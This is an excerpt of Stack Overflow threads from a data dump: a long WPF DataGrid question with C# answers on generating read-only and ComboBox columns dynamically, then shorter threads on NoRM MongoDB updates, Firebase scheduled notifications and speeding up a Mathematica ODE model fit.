I am quite new to WPF (from Winforms). I am using .Net 4.5 and the default DataGrid that comes along with the framework in WPF. The columns are created dynamically because I do not know at compile time. Now, based on data some columns will be read-only and some will be of ComboBox type.\n\nHow can I apply this logic dynamically while creating the columns dynamically as shown below. here is the code which I wrote so far. 
Whenever the data changes, the columns are generated dynamically based on the data.\nAlso, how do I generate \"different types\" of column dynamically (ComboBox, TextBox, etc...) based on data. The MVVM-ish way in WPF is kind of restricting me because I do not have much knowledge about templating. I am sure it should be easy once I get through.\n\nNB: Currently all this is working fine. I have a read-only databound grid. But, there is no support for selective editable columns and selective ComboBox columns.\n<code>public class DatagridExtension {\n \n public static readonly DependencyProperty RefDataSourceProperty =\n DependencyProperty.RegisterAttached(\n \"RefDataSource\",\n typeof(RefDataRecord),\n typeof(DatagridExtension),\n new PropertyMetadata( default(RefDataRecord), OnRefDataSourceChanged)\n );\n\n private static void OnRefDataSourceChanged(DependencyObject d, DependencyPropertyChangedEventArgs e)\n {\n var grid = d as DataGrid;\n var dataSource = e.NewValue as RefDataRecord;\n\n grid.ItemsSource = dataSource;\n grid.Columns.Clear();\n int count = 0;\n foreach (var col in dataSource.Columns)\n {\n grid.Columns.Add(\n new DataGridTextColumn\n {\n Header = col.Name,\n Binding = new Binding(string.Format(\"[{0}]\", count))\n }\n );\n count++;\n }\n }\n\n public static RefDataRecord GetRefDataSource(DependencyObject dependencyObject)\n {\n return (RefDataRecord) dependencyObject.GetValue(RefDataSourceProperty);\n }\n\n public static void SetRefDataSource(DependencyObject dependencyObject, RefDataRecord value)\n {\n dependencyObject.SetValue(RefDataSourceProperty, value);\n }\n}\n<\/code>\nhttp:\/\/msdn.microsoft.com\/en-us\/library\/system.windows.controls.datagridtemplatecolumn.celltemplate(v=vs.95).aspx\nAnswer: WPF DataGrid creates DataGridComboBoxColumn by default if data source property type derives from Enum and sets DataGridColumn.IsReadyOnly by default if property doesn't have public setter or if property has ReadOnlyAttribute with ReadOnlyAttribute.IsReadOnly = true.\nI will now show how to customize DataGrid column generation if your data source properties do not satisfy default conditions stated above.\nFirstly, I will introduce two attributes used to specify that property is read-only (EditableAttribute) and that property should be visualized as ComboBox with predefined drop-down items (NameValueAttribute).\nHere is EditableAttribute.cs:\n<code>using System;\n\nnamespace WpfApplication\n{\n [AttributeUsage(AttributeTargets.Property, AllowMultiple = false)]\n public sealed class EditableAttribute : Attribute\n {\n public bool AllowEdit { get; set; }\n }\n}\n<\/code>\nHere is NameValueAttribute.cs:\n<code>using System;\n\nnamespace WpfApplication\n{\n [AttributeUsage(AttributeTargets.Property, AllowMultiple = true)]\n public sealed class NameValueAttribute : Attribute\n {\n public string Name { get; set; }\n public object Value { get; set; }\n }\n}\n<\/code>\nNext, we need some sample classes that will be used for demonstration.\nSo here is Person.cs class that will represent a single item (row) in a DataGrid:\n<code>using System.ComponentModel;\n\nnamespace WpfApplication\n{\n public class Person : ObservableObject\n {\n private string name;\n private string surname;\n private char gender;\n\n public string Name\n {\n get { return this.name; }\n set { this.SetValue(ref this.name, value, \"Name\"); }\n }\n\n [Editable(AllowEdit = false)]\n public string Surname\n {\n get { return this.surname; }\n set { this.SetValue(ref this.surname, value, \"Surname\"); }\n }\n\n 
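\/\/ The NameValue attributes below are what the OnAutoGeneratingColumn handler shown later in this answer maps to a DataGridComboBoxColumn.\n        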
[NameValue(Name = \"Male\", Value = 'M')]\n [NameValue(Name = \"Female\", Value = 'F')]\n public char Gender\n {\n get { return this.gender; }\n set { this.SetValue(ref this.gender, value, \"Gender\"); }\n }\n }\n}\n<\/code>\nNotice how Surname property has EditableAttribute applied and Gender property has NameValueAttributes applied.\nAnd here is People.cs class that will represent DataGrid's data source:\n<code>using System.Collections.ObjectModel;\n\nnamespace WpfApplication\n{\n public class People : ObservableCollection<Person>\n {\n public People()\n {\n for (int i = 0; i < 100; ++i)\n this.Items.Add(new Person()\n {\n Name = \"Name \" + i,\n Surname = \"Surname \" + i,\n Gender = i % 2 == 0 ? 'M' : 'F'\n });\n }\n }\n}\n<\/code>\nBase class for Person is ObservableObject.cs which is common to all data-binding applications:\n<code>using System.Collections.Generic;\nusing System.ComponentModel;\n\nnamespace WpfApplication\n{\n public abstract class ObservableObject : INotifyPropertyChanged\n {\n public event PropertyChangedEventHandler PropertyChanged;\n\n protected virtual void OnPropertyChanged(PropertyChangedEventArgs e)\n {\n var handler = this.PropertyChanged;\n if (handler != null)\n handler(this, e);\n }\n\n protected void SetValue<T>(ref T field, T value, string propertyName)\n {\n if (!EqualityComparer<T>.Default.Equals(field, value))\n {\n field = value;\n this.OnPropertyChanged(new PropertyChangedEventArgs(propertyName));\n }\n }\n }\n}\n<\/code>\nNow, here is a XAML for MainWindow.xaml that hosts DataGrid control:\n<code><Window x:Class=\"WpfApplication.MainWindow\"\n xmlns=\"http:\/\/schemas.microsoft.com\/winfx\/2006\/xaml\/presentation\"\n xmlns:x=\"http:\/\/schemas.microsoft.com\/winfx\/2006\/xaml\"\n xmlns:local=\"clr-namespace:WpfApplication\">\n <Window.Resources>\n <local:People x:Key=\"itemsSource\"\/>\n <\/Window.Resources>\n <DataGrid ItemsSource=\"{StaticResource itemsSource}\" AutoGeneratingColumn=\"OnAutoGeneratingColumn\"\/>\n<\/Window>\n<\/code>\nCrucial part is DataGrid.AutoGeneratingColumn event handler <code>OnAutoGeneratingColumn<\/code>.\nThis event gets fired after DataGrid generates a DataGridColumn and is fired once for every auto-generated column. It is used to customize the auto-generated column or specify different one, depending on the provided data source property.\nHere is MainWindow.xaml.cs code-behind in which <code>OnAutoGeneratingColumn<\/code> event handler does exactly that. 
It customized generated column by setting it as read-only if data source property has EditableAttribute with AllowEdit = false, and it overrides auto-generated column with DataGridComboBoxColumn if data source property has NameValueAttributes:\n<code>using System;\nusing System.ComponentModel;\nusing System.Linq;\nusing System.Windows;\nusing System.Windows.Controls;\n\nnamespace WpfApplication\n{\n public partial class MainWindow : Window\n {\n public MainWindow()\n {\n InitializeComponent();\n }\n\n private void OnAutoGeneratingColumn(object sender, DataGridAutoGeneratingColumnEventArgs e)\n {\n var propertyDescriptor = (PropertyDescriptor)e.PropertyDescriptor;\n var dataBoundColumn = (DataGridBoundColumn)e.Column;\n\n var comboBoxColumn = GenerateComboBoxColumn(propertyDescriptor, dataBoundColumn);\n if (comboBoxColumn != null)\n e.Column = comboBoxColumn;\n\n if (IsReadOnlyProperty(propertyDescriptor))\n e.Column.IsReadOnly = true;\n }\n\n private static DataGridComboBoxColumn GenerateComboBoxColumn(PropertyDescriptor propertyDescriptor, DataGridBoundColumn dataBoundColumn)\n {\n var nameValueAttributes = Attribute.GetCustomAttributes(propertyDescriptor.ComponentType.GetProperty(propertyDescriptor.Name)).OfType<NameValueAttribute>().ToArray();\n\n if (nameValueAttributes.Length > 0)\n return new DataGridComboBoxColumn()\n {\n ItemsSource = nameValueAttributes,\n DisplayMemberPath = \"Name\",\n SelectedValuePath = \"Value\",\n SelectedValueBinding = dataBoundColumn.Binding\n };\n else\n return null;\n }\n\n private static bool IsReadOnlyProperty(PropertyDescriptor propertyDescriptor)\n {\n var editableAttribute = propertyDescriptor.Attributes.OfType<EditableAttribute>().FirstOrDefault();\n return editableAttribute != null ? !editableAttribute.AllowEdit : false;\n }\n }\n}\n<\/code>\n\nUPDATE FOR DYNAMIC CASE:\nWPF supports dynamic reflection with ICustomTypeDescriptor implemented on data items and ITypedList implemented on collection.\nAlso, .NET 4.5 supports ICustomTypeProvider, but since I do not have .NET 4.5 installed, I haven't tested it.\nNameValueAttribute.cs is same as before.\nHere is very simple implementation of ICustomTypeDescriptor and ITypedList in a working sample:\nDataProperty.cs\n<code>using System;\nusing System.ComponentModel;\n\nnamespace WpfApplication\n{\n public class DataProperty : PropertyDescriptor\n {\n private readonly Type propertyType;\n private readonly bool isReadOnly;\n private readonly Attribute[] attributes;\n\n public DataProperty(string propertyName, Type propertyType, bool isReadOnly, params Attribute[] attributes)\n : base(propertyName, null)\n {\n this.propertyType = propertyType;\n this.isReadOnly = isReadOnly;\n this.attributes = attributes;\n }\n\n protected override Attribute[] AttributeArray\n {\n get { return this.attributes; }\n set { throw new NotImplementedException(); }\n }\n\n public override Type ComponentType\n {\n get { return typeof(DataRecord); }\n }\n\n public override Type PropertyType\n {\n get { return this.propertyType; }\n }\n\n public override bool IsReadOnly\n {\n get { return this.isReadOnly; }\n }\n\n public override object GetValue(object component)\n {\n return ((DataRecord)component)[this.Name];\n }\n\n public override void SetValue(object component, object value)\n {\n if (!this.isReadOnly)\n ((DataRecord)component)[this.Name] = value;\n }\n\n #region Not implemented PropertyDescriptor Members\n\n public override bool CanResetValue(object component)\n {\n throw new NotImplementedException();\n }\n\n public override 
void ResetValue(object component)\n {\n throw new NotImplementedException();\n }\n\n public override bool ShouldSerializeValue(object component)\n {\n throw new NotImplementedException();\n }\n\n #endregion\n }\n}\n<\/code>\nDataRecord.cs\n<code>using System;\nusing System.Collections.Generic;\nusing System.ComponentModel;\n\nnamespace WpfApplication\n{\n public class DataRecord : INotifyPropertyChanged, ICustomTypeDescriptor\n {\n public event PropertyChangedEventHandler PropertyChanged;\n\n internal ITypedList container;\n\n private readonly IDictionary<string, object> values = new SortedList<string, object>();\n\n public object this[string propertyName]\n {\n get\n {\n object value;\n this.values.TryGetValue(propertyName, out value);\n return value;\n }\n set\n {\n if (!object.Equals(this[propertyName], value))\n {\n this.values[propertyName] = value;\n this.OnPropertyChanged(new PropertyChangedEventArgs(propertyName));\n }\n }\n }\n\n protected virtual void OnPropertyChanged(PropertyChangedEventArgs e)\n {\n var handler = this.PropertyChanged;\n if (handler != null)\n handler(this, e);\n }\n\n PropertyDescriptorCollection ICustomTypeDescriptor.GetProperties()\n {\n return this.container.GetItemProperties(null);\n }\n\n #region Not implemented ICustomTypeDescriptor Members\n\n AttributeCollection ICustomTypeDescriptor.GetAttributes()\n {\n throw new NotImplementedException();\n }\n\n string ICustomTypeDescriptor.GetClassName()\n {\n throw new NotImplementedException();\n }\n\n string ICustomTypeDescriptor.GetComponentName()\n {\n throw new NotImplementedException();\n }\n\n TypeConverter ICustomTypeDescriptor.GetConverter()\n {\n throw new NotImplementedException();\n }\n\n EventDescriptor ICustomTypeDescriptor.GetDefaultEvent()\n {\n throw new NotImplementedException();\n }\n\n PropertyDescriptor ICustomTypeDescriptor.GetDefaultProperty()\n {\n throw new NotImplementedException();\n }\n\n object ICustomTypeDescriptor.GetEditor(Type editorBaseType)\n {\n throw new NotImplementedException();\n }\n\n EventDescriptorCollection ICustomTypeDescriptor.GetEvents(Attribute[] attributes)\n {\n throw new NotImplementedException();\n }\n\n EventDescriptorCollection ICustomTypeDescriptor.GetEvents()\n {\n throw new NotImplementedException();\n }\n\n PropertyDescriptorCollection ICustomTypeDescriptor.GetProperties(Attribute[] attributes)\n {\n throw new NotImplementedException();\n }\n\n object ICustomTypeDescriptor.GetPropertyOwner(PropertyDescriptor pd)\n {\n throw new NotImplementedException();\n }\n\n #endregion\n }\n}\n<\/code>\nDataRecordCollection.cs:\n<code>using System;\nusing System.Collections.ObjectModel;\nusing System.ComponentModel;\n\nnamespace WpfApplication\n{\n public class DataRecordCollection<T> : ObservableCollection<T>, ITypedList where T : DataRecord\n {\n private readonly PropertyDescriptorCollection properties;\n\n public DataRecordCollection(params DataProperty[] properties)\n {\n this.properties = new PropertyDescriptorCollection(properties);\n }\n\n protected override void InsertItem(int index, T item)\n {\n item.container = this;\n base.InsertItem(index, item);\n }\n\n PropertyDescriptorCollection ITypedList.GetItemProperties(PropertyDescriptor[] listAccessors)\n {\n return this.properties;\n }\n\n string ITypedList.GetListName(PropertyDescriptor[] listAccessors)\n {\n throw new NotImplementedException();\n }\n }\n}\n<\/code>\nMainWindow.xaml:\n<code><Window x:Class=\"WpfApplication.MainWindow\"\n 
xmlns=\"http:\/\/schemas.microsoft.com\/winfx\/2006\/xaml\/presentation\"\n xmlns:x=\"http:\/\/schemas.microsoft.com\/winfx\/2006\/xaml\"\n xmlns:local=\"clr-namespace:WpfApplication\">\n <DataGrid x:Name=\"dataGrid\" AutoGeneratingColumn=\"OnAutoGeneratingColumn\"\/>\n<\/Window>\n<\/code>\nMainWindow.xaml.cs:\n<code>using System.ComponentModel;\nusing System.Linq;\nusing System.Windows;\nusing System.Windows.Controls;\n\nnamespace WpfApplication\n{\n public partial class MainWindow : Window\n {\n public MainWindow()\n {\n InitializeComponent();\n\n var records = new DataRecordCollection<DataRecord>(\n new DataProperty(\"Name\", typeof(string), false),\n new DataProperty(\"Surname\", typeof(string), true),\n new DataProperty(\"Gender\", typeof(char), false, new NameValueAttribute() { Name = \"Male\", Value = 'M' }, new NameValueAttribute() { Name = \"Female\", Value = 'F' }));\n\n for (int i = 0; i < 100; ++i)\n {\n var record = new DataRecord();\n record[\"Name\"] = \"Name \" + i;\n record[\"Surname\"] = \"Surname \" + i;\n record[\"Gender\"] = i % 2 == 0 ? 'M' : 'F';\n records.Add(record);\n }\n\n this.dataGrid.ItemsSource = records;\n }\n\n private void OnAutoGeneratingColumn(object sender, DataGridAutoGeneratingColumnEventArgs e)\n {\n e.Column.Header = ((PropertyDescriptor)e.PropertyDescriptor).DisplayName;\n\n var propertyDescriptor = (PropertyDescriptor)e.PropertyDescriptor;\n var dataBoundColumn = (DataGridBoundColumn)e.Column;\n\n var comboBoxColumn = GenerateComboBoxColumn(propertyDescriptor, dataBoundColumn);\n if (comboBoxColumn != null)\n e.Column = comboBoxColumn;\n }\n\n private static DataGridComboBoxColumn GenerateComboBoxColumn(PropertyDescriptor propertyDescriptor, DataGridBoundColumn dataBoundColumn)\n {\n var nameValueAttributes = propertyDescriptor.Attributes.OfType<NameValueAttribute>().ToArray();\n\n if (nameValueAttributes.Length > 0)\n return new DataGridComboBoxColumn()\n {\n ItemsSource = nameValueAttributes,\n DisplayMemberPath = \"Name\",\n SelectedValuePath = \"Value\",\n SelectedValueBinding = dataBoundColumn.Binding\n };\n else\n return null;\n }\n }\n}\n<\/code>\nComment: Hi Stipo, Thanks for replying. In my case I do not know the columns at compile-time. Unlike the way you have represented it using the Person object, I think I have just a property bag of generic System.Object. So, I cannot set the attributes the way you have shown.\nComment: No, it won't work for AutoGenerateColumns = false because then you must create columns by yourself. The whole point of ITypedList is to provide all the necessary information to DataGrid so it automatically generates columns from information provided by ITypedList.\nComment: I have really learned something new. The `PropertyDescriptor` mechanism is so exciting. Thanks !!!\nAnswer: Firstly, one of the main advantages of WPF over WinForms is the ability to declare the user interface using templates, so you should avoid declaring UI components in code as much as possible.\nAs I understand it, you want to display a collection of different objects based on object type\/data.\nThe best way to implement such logic is to implement your own DataTemplateSelector.\nI suggest you read the following articles:\n\nhttp:\/\/www.wpftutorial.net\/DataGrid.html\nhttp:\/\/www.switchonthecode.com\/tutorials\/wpf-tutorial-how-to-use-a-datatemplateselector\n\nP.S.\nFor reference. 
Example of declaring DataTemplate in code:\n<code>\/\/create the data template\nDataTemplate cardLayout = new DataTemplate();\ncardLayout.DataType = typeof(CreditCardPayment);\n\n\/\/set up the stack panel\nFrameworkElementFactory spFactory = new FrameworkElementFactory(typeof(StackPanel));\nspFactory.Name = \"myComboFactory\";\nspFactory.SetValue(StackPanel.OrientationProperty, Orientation.Horizontal);\n\n\/\/set up the card holder textblock\nFrameworkElementFactory cardHolder = new FrameworkElementFactory(typeof(TextBlock));\ncardHolder.SetBinding(TextBlock.TextProperty, new Binding(\"BillToName\"));\ncardHolder.SetValue(TextBlock.ToolTipProperty, \"Card Holder Name\");\nspFactory.AppendChild(cardHolder);\n\n\/\/set up the card number textblock\nFrameworkElementFactory cardNumber = new FrameworkElementFactory(typeof(TextBlock));\ncardNumber.SetBinding(TextBlock.TextProperty, new Binding(\"SafeNumber\"));\ncardNumber.SetValue(TextBlock.ToolTipProperty, \"Credit Card Number\");\nspFactory.AppendChild(cardNumber);\n\n\/\/set up the notes textblock\nFrameworkElementFactory notes = new FrameworkElementFactory(typeof(TextBlock));\nnotes.SetBinding(TextBlock.TextProperty, new Binding(\"Notes\"));\nnotes.SetValue(TextBlock.ToolTipProperty, \"Notes\");\nspFactory.AppendChild(notes);\n\n\/\/set the visual tree of the data template\ncardLayout.VisualTree = spFactory;\n\n\/\/set the item template to be our shiny new data template\ndrpCreditCardNumberWpf.ItemTemplate = cardLayout;\n<\/code>\nbut as i say above, you should avoid this.\nComment: You are only contradicting your solution and asking me to avoid this. So, I will wait for better answers then.\nAnswer: This is the correct answer - http:\/\/www.paulstovell.com\/dynamic-datagrid (see the template creation logic dynamically. Its clever).\nAnd, MMVM will be achieved like this - http:\/\/www.codeproject.com\/Articles\/36462\/Binding-a-ListView-to-a-Data-Matrix (almost what I have posted in the question)\nAnswer: I was away from the Internet for a few days, but I think that I have found the better approach with simplified PropertyDescriptor architecture which doesn't require to implement ICustomTypeDescriptor. Here is the entire code:\n<code>using System;\nusing System.Collections;\nusing System.Collections.Generic;\nusing System.Collections.ObjectModel;\nusing System.ComponentModel;\nusing System.Windows;\nusing System.Windows.Controls;\nusing System.Windows.Data;\n\nnamespace WpfApplication\n{\n public partial class MainWindow : Window\n {\n public MainWindow()\n {\n InitializeComponent();\n\n var records = new RecordCollection(new Property(\"Name\"), new Property(\"Surname\"));\n\n for (int i = 0; i < 1000; ++i)\n records.Add(new Record()\n {\n { \"Name\", \"John \" + i },\n { \"Surname\", \"Doe \" + i }\n });\n\n this.dataGrid.ItemsSource = records;\n }\n\n private void OnAutoGeneratingColumn(object sender, DataGridAutoGeneratingColumnEventArgs e)\n {\n var property = e.PropertyDescriptor as Property;\n if (property != null)\n {\n var binding = new Binding() { Path = new PropertyPath(property), Mode = property.IsReadOnly ? 
BindingMode.OneWay : BindingMode.TwoWay };\n var dataGridBoundColumn = e.Column as DataGridBoundColumn;\n if (dataGridBoundColumn != null)\n dataGridBoundColumn.Binding = binding;\n else\n {\n var dataGridComboBoxColumn = e.Column as DataGridComboBoxColumn;\n if (dataGridComboBoxColumn != null)\n dataGridComboBoxColumn.SelectedItemBinding = binding;\n }\n }\n }\n }\n\n public sealed class Record : INotifyPropertyChanged, IEnumerable\n {\n public event PropertyChangedEventHandler PropertyChanged;\n\n private readonly IDictionary<string, object> values = new SortedList<string, object>(StringComparer.Ordinal);\n\n private void OnPropertyChanged(PropertyChangedEventArgs e)\n {\n var handler = this.PropertyChanged;\n if (handler != null)\n handler(this, e);\n }\n\n public object GetValue(string name)\n {\n object value;\n return this.values.TryGetValue(name, out value) ? value : null;\n }\n\n public void SetValue(string name, object value)\n {\n if (!object.Equals(this.GetValue(name), value))\n {\n this.values[name] = value;\n this.OnPropertyChanged(new PropertyChangedEventArgs(name));\n }\n }\n\n public void Add(string name, object value)\n {\n this.values[name] = value;\n }\n\n IEnumerator IEnumerable.GetEnumerator()\n {\n return this.values.GetEnumerator();\n }\n }\n\n public sealed class Property : PropertyDescriptor\n {\n private readonly Type propertyType;\n private readonly bool isReadOnly;\n\n public Property(string name)\n : this(name, typeof(string))\n {\n }\n\n public Property(string name, Type propertyType)\n : this(name, propertyType, false)\n {\n }\n\n public Property(string name, Type propertyType, bool isReadOnly, params Attribute[] attributes)\n : base(name, attributes)\n {\n this.propertyType = propertyType;\n this.isReadOnly = isReadOnly;\n }\n\n public override Type ComponentType\n {\n get { return typeof(Record); }\n }\n\n public override Type PropertyType\n {\n get { return this.propertyType; }\n }\n\n public override bool IsReadOnly\n {\n get { return this.isReadOnly; }\n }\n\n public override object GetValue(object component)\n {\n var record = component as Record;\n return record != null ? 
record.GetValue(this.Name) : null;\n }\n\n public override void SetValue(object component, object value)\n {\n var record = component as Record;\n if (record != null)\n record.SetValue(this.Name, value);\n }\n\n public override bool CanResetValue(object component)\n {\n throw new NotSupportedException();\n }\n\n public override void ResetValue(object component)\n {\n throw new NotSupportedException();\n }\n\n public override bool ShouldSerializeValue(object component)\n {\n throw new NotSupportedException();\n }\n }\n\n public sealed class RecordCollection : ObservableCollection<Record>, ITypedList\n {\n private readonly PropertyDescriptorCollection properties;\n\n public RecordCollection(params Property[] properties)\n {\n this.properties = new PropertyDescriptorCollection(properties);\n }\n\n PropertyDescriptorCollection ITypedList.GetItemProperties(PropertyDescriptor[] listAccessors)\n {\n return this.properties;\n }\n\n string ITypedList.GetListName(PropertyDescriptor[] listAccessors)\n {\n return string.Empty;\n }\n }\n}\n\n<Window x:Class=\"WpfApplication.MainWindow\"\n xmlns=\"http:\/\/schemas.microsoft.com\/winfx\/2006\/xaml\/presentation\"\n xmlns:x=\"http:\/\/schemas.microsoft.com\/winfx\/2006\/xaml\"\n xmlns:local=\"clr-namespace:WpfApplication\">\n <DataGrid x:Name=\"dataGrid\" AutoGeneratingColumn=\"OnAutoGeneratingColumn\"\/>\n<\/Window>\n<\/code>\nThe key thing in this code is creating a Binding with a BindingPath that contains a Property instance, instead of a string. This enables a simplification of PropertyDescriptor architecture because ICustomTypeDescriptor is not required anymore.\nWhat do you think about this solution?\nComment: Thanks !! The idea is to use `MVVM` approach and change the cells dynamically based on type of data i.e. if its a collection, hook in a combobox cell, if a string then a TextBlock (readonly case) or a TextBox (if editable). I do not want to use the codebehind .cs file at all. Inspired on MVVM by this awesome video in this blog - `http:\/\/blog.lab49.com\/archives\/2650`. So the link below which I have posted talks about `Data Templating (XAML)` based on the type of Data. `Can we do something similar with your logic in place ?`\nComment: DataGrid is a special control, it doesn't use implicit (based on DataType) or explicit DataTemplate when generating cell content. Cell content generation is based on a column to which cell belongs. DataGridColumn.GenerateElement (http:\/\/msdn.microsoft.com\/en-us\/library\/system.windows.controls.datagridcolumn.generateelement.aspx) is a method responsible for generating cell content and each DataGridColumn-derived class generates a different content. So I think that you won't be able to solve this without using codebehind. Note that codebehind should not be considered wrong in MVVM as many think.\nComment: It would be wrong only if your ViewModel code-behind would reference Views, which is clearly not the case in my presented solution. I am not sure anymore is your data column-homogeneous or column-heterogeneous (are all cells in a specific column of the same type?). 
If all cells in a specific column are of the same type, then you can easily extend my code with your requirements (you only need to handle creating the ComboBox cell, the other requirements are already taken care of) by extending the code in the MainWindow.OnAutoGeneratingColumn method.\nComment: In the MainWindow.OnAutoGeneratingColumn method, just check if Property.PropertyType is a collection type, and if it is, set e.Column to a new instance of DataGridComboBoxColumn and set ItemsSource and SelectedItemBinding on that DataGridComboBoxColumn.\n","meta":{"source":"stackoverflow","title":"WPF: Datagrid - Apply DataGridTemplateColumn.CellTemplate dynamically","dup_signals":{}},"subset":"stackexchange"}
+{"text":"NoRM UpdateOne no work\n\nQuestion: I'm using NoRM + MongoDB in an application test. I found the source code of the Mongo Session at http:\/\/normproject.org\/samples where the update method wraps this:\n<code>using(var db = Mongo.Create(_connectionString))\n{\n db.GetCollection<T>().UpdateOne(item, item);\n}\n<\/code>\nBut when I send an object to update using this method, the object is not saved; however, if I call Save instead of UpdateOne, the object is saved.\nMy objects: https:\/\/gist.github.com\/1616565\nWhat's wrong?\nAnswer: I would recommend using the official C# driver, which you can find at:\nhttp:\/\/www.mongodb.org\/display\/DOCS\/CSharp+Language+Center\nAnswer: Hopefully this helps:\nhttp:\/\/groups.google.com\/group\/norm-mongodb\/browse_thread\/thread\/8ba8b462b6fe16a5\/a4bfaecef4b1cbfc?lnk=gst&q=Update#a4bfaecef4b1cbfc\nAnup\n","meta":{"source":"stackoverflow","title":"NoRM UpdateOne no work","dup_signals":{}},"subset":"stackexchange"}
+{"text":"Firebase Automated Cron Job Options Without Functions\n\nQuestion: I have an app (Flutter, using Android Studio) that I am in the final stages of, and I would, in an ideal world, want to include a feature to notify the user via a mobile notification if a date held against their UID is equal to today (let's use a birthday as an example).\nI've spent 2 days looking into all the options, and was very close to using Cloud Functions to store a once-a-day cron function to notify all users, using FCM, based on the condition above - but something stopped me.\nI'm very new to app building. So new that I cannot confidently say I do not have a bug or infinite loop somewhere that could rack up a huge bill after upgrading to the Blaze plan - without which I cannot use Functions (I literally had my credit card in hand on the upgrade page and stopped).\nAfter 3 months of app building I feel I'm between a rock and a hard place. I don't want to launch without auto-notifications (as it's pretty key to the slickness of the app) BUT I cannot risk a sky's-the-limit, no-cap, no-protection Blaze account if the worst were to happen.\nIt seems crazy for Google to put so much effort into Firebase, which to be fair helps new developers code and launch apps, and yet leave them unnecessarily exposed to cost without automated protection. At least the Flame plan capped your spend - but I can see this is a real concern to new app developers such as myself (I've developed for the web for years). I just can't risk Blaze. I am more than happy to pay for things I use, but not to put myself at risk. Anyway, I digress...\nWithout upgrading to Blaze - is there any way a newbie such as myself, who is still learning the ropes, can use FCM and a cron job to check Cloud Firestore every day for users where a certain condition applies (i.e. 
UID date = today) - and notify them through a notification to their mobile device?\nComment: If you're looking for recommendations for products, that's off-topic for stack Overflow. Also, Cloud Functions is really the easiest way to get this work done, and your other options are going to be just as difficult or moreso.\nComment: No not products - perhaps suggestions, tutorials, plugins etc.... I'm not looking to move away from Firebase, just work within in (as a newbie not so proficient with all the terminology) without putting myself at a cost risk I am powerless to control\nComment: But if you feel this is by far the simplest option, maybe I will have to launch without the notifications - I am probably too new to the party to start looking at more complicated options :)\nComment: All recommendations for offsite resources are [off topic for Stack Overflow](https:\/\/stackoverflow.com\/help\/on-topic): \"*Questions asking us to recommend or find a book, tool, software library, tutorial or other off-site resource are off-topic for Stack Overflow*\"\nComment: Apologies - my bad\nAnswer: I would recommend using Google Cloud Functions and Cloud Scheduler to accomplish this.\nIt is worth noting that Firebase + Google Cloud provide an amount of free usage per month. It is quite likely that you could keep your usage under the limits, at least initially. Also, if you are a new Google Cloud customer, there may currently be a trial offer you can redeem for things not covered in the free tier.\n\nhttps:\/\/cloud.google.com\/free\nhttps:\/\/firebase.google.com\/pricing\nhttps:\/\/cloud.google.com\/scheduler\nComment: Thanks Chris for the suggestion. Sounds like a good option I've seen some trial offers in the region of $300, but my big worry is something wrong in the code costing thousands of dollars overnight before I read alerts set to warn. I'm getting up to 700 reads a day and it's just me testing a small number of records - so I know I have some less than efficient code somewhere!\nComment: It may be valuable to forecast your usage. Also you may want to look into configuring Budgets and Billing Alerts.\n\nhttps:\/\/cloud.google.com\/billing\/docs\/how-to\/budgets\nComment: Yes the alerts are a good idea, but if something went awry at 1am I wouldn't pick up the email alert until 8am. A lot of loops can happen in 7 hours. The cautiousness is because this is my first app so new uncharted territory. 
I do completely understand where you are coming from though - and useful suggestions - this just is what it is I guess\n","meta":{"source":"stackoverflow","title":"Firebase Automated Cron Job Options Without Functions","dup_signals":{}},"subset":"stackexchange"} +{"text":"How to speed up NonlinearModelFit applied on a NDSolve solution?\n\nQuestion: I'm trying to perform fittings of a model defined through a system of ODEs to data consisting of time courses of a measured quantity.\nAs described in a previous question, the system of ODEs is as follows:\n<code>X'[t]:= m[t].X[t]\nX[t_] := {h[t], r[t], rh1[t], rh2[t], rh3[t]}\nm[t_] := {{-k1*r[t], 0, ki1, 0, 0}, {0, -k1*h[t], ki1, 0, 0}, {0, k1*h[t], -(ki1 + k2), ki2, 0}, {0, 0, k2, -(ki2 + k3), ki3}\n<\/code>\nand the actual quantity I need to evaluate is:\n<code>F:= aF.X[t]\naF:={0,aR,aRH1,aRH2,aRH3}\n<\/code>\nAfter the incorporation of some suggestions given in this forum, I end up with the following procedure to fit the model:\nModel to be fitted:\n<code>modelo[k1, ki1, k2, ki2, k3, ki3, aR, aRH1, aRH2, aRH3, Ht, Rt] =\nModule[{X, m, aF, sol},\nX[t_] := {h[t], r[t], rh1[t], rh2[t], rh3[t]};\nm[t_] := {{-k1*r[t], 0, ki1, 0, 0}, {0, -k1*h[t], ki1, 0, 0}, {0, k1*h[t], -(ki1 + k2), ki2, 0}, {0, 0, k2, -(ki2 + k3), ki3}, {0, 0, 0, k3, -ki3}};\naF = {0, aR, aRH1, aRH2, aRH3};\nsol = NDSolve[{X'[t] == m[t].X[t], X[0] == {Ht, Rt, 0, 0, 0}}, X[t], {t, 0, 500}];\nFunction[{tu}, Evaluate[aF.Flatten[X[t] \/. sol] - aR*Rt] \/. t :> tu]])\n<\/code>\nData:\n<code>data = Table[{t, .22 (1 - E^(-7.2 t)) + 0.10 (1 - E^(-0.084 t)) + 0.15 (1 - E^(-0.027 t))}, {t, 0, 500, 0.1}]\n<\/code>\nFitting routine (leaving some parameters fixed):\n<code>k1 = 0.0012;\nk2 = 0.43;\nki2 = 0.0055;\nk3 = 0.01;\nki3 = 0.0096;\naR = 0.0034;\nHt = 800;\nRt = 62; (*The last three quantities are not fitting parameters but fixed ones, whose values are known. *)\nfit = NonlinearModelFit[data, {modelo[k1, ki1, k2, ki2, k3, ki3, aR, aRH1, aRH2, aRH3, Ht, Rt][t], {2 <= ki1 <= 20, 0.001 <= aRH1 <= 0.1, 0.001 <= aRH2 <= 0.1, 0.001 <= aRH3 <= 0.1}}, {{ki1, 5}, {aRH1, .032}, {aRH2, .01}, {aRH3, .012}}, t, Method -> {NMinimize, Method -> \"NelderMead\"}]]\n<\/code>\nHere is the problem. The model works and the fitting code too, but it is too slow. For instance, it takes about 110 s (in Linux Mint MATE 1.8.1 on a dual core AMD A4 machine, with 3 GiB RAM) for a 2 iterations run and a data set of 5000 points. Given that I pretend to use the program to fit series of ~ 8 curves of ~ 14000 points, this performance is obviously too slow (it is much faster in other programs such us COPASI). Please, let me know if you have any idea on how to speed up the code.\nEdit 1:\nTo asses the quality of the fitting I add here a new data set obtained from the model with a given set of parameter values:\n<code>newdata = Table[{t, Evaluate[With[{k1 = 0.0012, ki1 = 5, k2 = 0.43, ki2 = 0.0055, k3 = 0.01, ki3 = 0.0096, aR = 0.0034, aRH1 = .032, aRH2 = .01, aRH3 = .012},modelo[k1, ki1, k2, ki2, k3, ki3, aR, aRH1, aRH2, aRH3, Ht, Rt]]][t]}, {t, 0, 500}]\n<\/code>\nComment: What are the expected results for the 